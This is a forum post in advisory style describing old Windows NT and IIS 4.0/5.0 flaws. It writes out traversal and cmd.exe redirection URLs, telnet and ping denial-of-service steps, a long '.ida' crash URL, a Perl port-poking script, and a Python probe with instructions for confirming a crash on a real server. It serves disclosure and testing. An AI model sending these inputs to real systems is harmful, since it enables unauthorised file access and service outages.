Title: NT vulnerabilities and their descriptions (English) [Print this page]
Author: 雜七雜八    Time: 2011-1-13 17:12

Affected systems: NT 4.0, IIS 1.0

A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the web server's content root directory (the server accepts '\' as a path separator and lets '..' climb above the content root before mapping the URL to the file system).

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default the user 'Guest' or IUSR_WWW (the account IIS uses for anonymous requests) has read access to all files on an NT disk: the default NTFS permission on a fresh NT 4.0 install is Everyone: Full Control, and FAT volumes carry no permissions at all. These files can be browsed, executed or downloaded by wandering guests.
--------------------------------------------------------------------

Affected systems: NT 4.0

A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'. If the file 'target.bat' already exists, it will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.

In both cases the text after the script name is passed through to cmd.exe, which runs .bat/.cmd requests on the server, so the '>' is interpreted there as output redirection; %0A%0D is a percent-encoded line-feed/carriage-return pair.
----------------------------------------------------------------------

Affected systems: NT 3.51, 4.0

Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'. The following steps:

  Telnet to an NT 4.0 system on port 135
  Type about 10 characters followed by a <CR>
  Exit Telnet

result in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than the usual process time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where the IIS services must be restarted. If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script gleaned from postings on the NTsecurity@iss.net list, for testing the ports on your own system (Perl is available from the NT Resource Kit). Note that it deliberately skips the three ports known to lock up; set $knownports to 0 only if you are prepared to reboot the target.
/*begin poke code*/
# Original used chat2.pl (the Perl 4 library shipped with the Resource Kit
# Perl); rewritten here on core IO::Socket::INET so it runs on a current Perl.
# Also fixed: the loop started at $0 (the program name) instead of 1, and
# $ARGV[0] && shift did not reliably assign the server name.
use strict;
use warnings;
use IO::Socket::INET;

my $systemname = shift @ARGV or die "usage: perl poke servername\n";

my $verbose    = 1;  # tell me what you're hitting
my $knownports = 1;  # don't hit the known problem ports (53, 135, 1031)

for (my $port = 1; $port <= 65535; $port++) {
    next if $knownports && ($port == 53 || $port == 135 || $port == 1031);

    print "Trying port: $port\n" if $verbose;

    # Same probe as the telnet steps above: ten or more characters and a <CR>
    my $fh = IO::Socket::INET->new(
        PeerAddr => $systemname, PeerPort => $port,
        Proto    => 'tcp',       Timeout  => 2,
    ) or next;    # nothing listening on this port: move on
    $fh->print("This is about ten characters or more\r");
    $fh->close;
}
/*end poke code*/

Save the above text as c:\perl\bin\poke and run it like this:

  C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------
Affected systems: NT 4.0

Using a telnet application to connect to a web server on HTTP port 80 and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error. The error occurred on date @ time. The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT)"

(c0000005 is STATUS_ACCESS_VIOLATION; inetinfo.exe is the process hosting the IIS services, so all of them go down with it.)

--------------------------------------------------------------------------------
Affected systems: NT 3.51, 4.0

Large-packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0x0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

65527 bytes of ICMP data plus the 8-byte ICMP header and 20-byte IP header is 65555 bytes, more than the 65535-byte maximum an IP datagram can carry, so the last fragment lands beyond the end of the receiver's reassembly buffer. NT 4.0 will send such packets (and so can be used to launch the attack) but does not crash on receiving them.

--------------------------------------------------------------------------------

Microsoft IIS 5.0 has problems handling a specific form of URL ending in ".ida". The problem can have two kinds of result. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively a denial of service against the server). All IIS versions up to and including IIS 5.0 are vulnerable. When a remote attacker requests the malformed URL:

http://www.example.com/...[25kb of '.']...ida

the server will either crash (an effective DoS) or report its current directory location (revealing the directory structure).
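For the Ping of Death entry above (not the .ida entry): the reason a 65527-byte ping is fatal is arithmetic on the fragment offsets, and the fix in any IP stack is the bounds check that the vulnerable TCPIP.SYS lacked. The following added example (my code, not from the original post) computes the datagram size for a given "ping -l" value, splits it into fragments the way a sender with an assumed 1500-byte MTU and no IP options would, and applies the check a reassembler must make before copying each fragment: its offset*8 plus its length must fit inside the 65535-byte limit less the IP header.

```python
IP_MAX_LEN = 65535      # the 16-bit Total Length field cannot express more
IP_HDR_LEN = 20         # assumed: no IP options
ICMP_HDR_LEN = 8        # echo request header (type, code, checksum, id, seq)


def ping_datagram_length(payload_len):
    """Total IP datagram size for 'ping -l payload_len'."""
    return IP_HDR_LEN + ICMP_HDR_LEN + payload_len


def fragments_for(payload_len, mtu=1500):
    """Split an ICMP echo carrying payload_len bytes into fragments as a sender
    would for the given MTU. Each fragment is (offset_in_8_byte_units, length,
    more_fragments), i.e. what goes into the IP header of that fragment."""
    total = ICMP_HDR_LEN + payload_len          # bytes that follow the IP header
    per_frag = (mtu - IP_HDR_LEN) // 8 * 8      # fragment bodies are 8-byte multiples
    frags, off = [], 0
    while off < total:
        ln = min(per_frag, total - off)
        end = off + ln
        frags.append((off // 8, ln, end < total))
        off = end
    return frags


def reassembly_bounds_ok(frags):
    """The check a reassembler must perform before copying a fragment into the
    buffer: the end of every fragment has to fit in a maximum-size datagram.
    The vulnerable stacks trusted offset+length and wrote past the buffer."""
    limit = IP_MAX_LEN - IP_HDR_LEN
    return all(off * 8 + ln <= limit for off, ln, _ in frags)


if __name__ == "__main__":
    for size in (65507, 65527):
        frags = fragments_for(size)
        print(f"ping -l {size}: {ping_datagram_length(size)} bytes, "
              f"{len(frags)} fragments, bounds ok = {reassembly_bounds_ok(frags)}")
```

65507 is the largest legal value (65507 + 8 + 20 = 65535 exactly); anything above it produces a final fragment whose end exceeds the limit, which is what the check rejects.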

--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be used to reveal the true path of files (where they physically reside on the local hard drive) by requesting a non-existent file with an .idq or .ida extension. By requesting a URL such as:

http://www.microsoft.com/anything.ida

or:

http://www.microsoft.com/anything.idq

a remote user gets a response that looks like:

'The IDQ d:\http\anything.idq could not be found'

Such a response allows him to gain further knowledge of how the web site is organised and of the directory structure of the server. Both extensions are mapped to the Indexing Service ISAPI extension (idq.dll); removing that application mapping from servers that do not need it takes away both this disclosure and the long-URL crash described above.
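Checking a server for the .ida/.idq behaviour above, and for the "GET ../.." crash described earlier, comes down to the same procedure: send one raw request, classify whether the server answered, reset, or went silent, and search any answer for a leaked local path. The following is an added example, not code from the original post or from Microsoft. It builds the requests (both the HTTP/1.0 form and the bare line a telnet user types), extracts the path from the error text quoted above, and includes a constructed stand-in server (FakeIIS, replying with the page's example message; the d:\http\ root is assumed and the reply is not real IIS output) so the whole exchange can be run offline. All function and class names are mine.

```python
import re
import socket
import socketserver
import threading

# Matches the IDQ/IDA error text quoted in the entry above and captures the
# local path it leaks (drive letter, then everything up to ' could not be found').
DISCLOSED_PATH = re.compile(r"The ID[QA] ([A-Za-z]:\\[^'\r\n]*?) could not be found")


def build_request(host, target, simple=False):
    """One raw request for the given request-target. simple=True gives the
    HTTP/0.9-style line a person types into telnet ('GET ../..' <cr>)."""
    if simple:
        return f"GET {target}\r\n".encode("latin-1")
    return f"GET {target} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("latin-1")


def ida_dos_target(dots=25000):
    """The long-URL shape from the .ida entry: about 25 KB of '.' then 'ida'."""
    return "/" + "." * dots + "ida"


def find_disclosed_path(body):
    """Return the server-side path leaked by the IDQ/IDA error page, or None."""
    m = DISCLOSED_PATH.search(body)
    return m.group(1) if m else None


def probe(host, port, request, timeout=5.0):
    """Send one raw request and classify the outcome:
      ('response', text) - the server answered
      ('closed', None)   - refused, reset, or closed without a reply: the
                           symptom of inetinfo.exe having died
      ('timeout', None)  - connected but nothing came back (hung service)"""
    chunks = []
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(request)
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
    except socket.timeout:
        if not chunks:
            return ("timeout", None)
    except (ConnectionRefusedError, ConnectionResetError, BrokenPipeError):
        if not chunks:
            return ("closed", None)
    if not chunks:
        return ("closed", None)
    return ("response", b"".join(chunks).decode("latin-1", "replace"))


class FakeIIS(socketserver.BaseRequestHandler):
    """Constructed stand-in for the IIS .idq/.ida handler so the probe can run
    offline. Echoes the requested name inside the page's example message."""
    def handle(self):
        data = b""
        while b"\r\n\r\n" not in data:          # read the whole request first
            chunk = self.request.recv(65536)
            if not chunk:
                break
            data += chunk
            first, sep, _ = data.partition(b"\r\n")
            if sep and b" HTTP/" not in first:  # simple request: one line only
                break
        target = data.split(b" ", 2)[1].decode("latin-1") if data.startswith(b"GET ") else "/"
        name = target.rsplit("/", 1)[-1]
        body = f"The IDQ d:\\http\\{name} could not be found"   # assumed root
        self.request.sendall(("HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"
                              + body).encode("latin-1"))


def start_fake_iis():
    """Start FakeIIS on an ephemeral loopback port; returns (server, port)."""
    srv = socketserver.TCPServer(("127.0.0.1", 0), FakeIIS)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


if __name__ == "__main__":
    srv, port = start_fake_iis()
    kind, body = probe("127.0.0.1", port, build_request("127.0.0.1", "/anything.idq"))
    print(kind, find_disclosed_path(body))
    srv.shutdown()
    srv.server_close()
```

Against a real server the useful sequence is: probe with a harmless request, send the malformed one (the 25 KB .ida target, or build_request(host, "../..", simple=True) for the earlier entry), then probe with the harmless request again; a 'closed' or 'timeout' on the third step is the crash, while a 'response' whose find_disclosed_path() is not None is the path disclosure.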